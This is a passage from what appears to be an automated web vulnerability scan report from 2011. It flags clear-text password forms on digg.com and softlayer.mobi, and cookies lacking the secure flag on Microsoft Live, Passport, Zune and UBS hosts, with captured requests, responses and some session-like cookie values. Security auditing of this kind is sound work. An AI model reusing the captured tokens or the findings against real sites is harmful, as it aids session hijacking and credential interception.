X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.2. http://digg.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="login" method="post" action="/ajax/auth/prepare/digg" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password" class="text-input placeholder-input" tabindex="2" id="password">
</span>
...[SNIP]...

5.3. http://digg.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.4. http://digg.com/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="register" method="post" action="/ajax/auth/register" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password-register" id="password-register" class="text-input placeholder-input" tabindex="3">
</span>
...[SNIP]...

5.5. http://digg.com/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.6. http://digg.com/search  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.7. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.8. http://digg.com/topic  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.9. http://digg.com/upcoming  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.10. http://manage.softlayer.mobi/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://manage.softlayer.mobi
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
Content-Length: 1832
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>SoftLayer - Mobile Portal Login</title>
<link rel="stylesheet" type="text/css
...[SNIP]...
<center>
<form id="index_form" name="data[index][index?cacheKey=]_form" action="http://manage.softlayer.mobi/index/index?cacheKey=" method="post"> <center>
...[SNIP]...
<BR>
<input type="password" id="user_password" name="data[User][password]" style="font-size:x-small" class="logintext" tabIndex="2" size="10" /><BR>
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 12 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://accountservices.passport.net/gethip.srf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

6.2. https://ebanking.ubs.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
Path:   /en/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.4. https://live.zune.net/xweb/passport/rightCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.5. https://live.zune.net/xweb/passport/topCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.6. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E59 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.7. https://login.live.com/pp1100/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E41 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.8. https://login.live.com/ppsecure/post.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E54 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.9. https://login.live.com/ppsecure/secure.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E32 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.10. https://login.live.com/resetpw.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
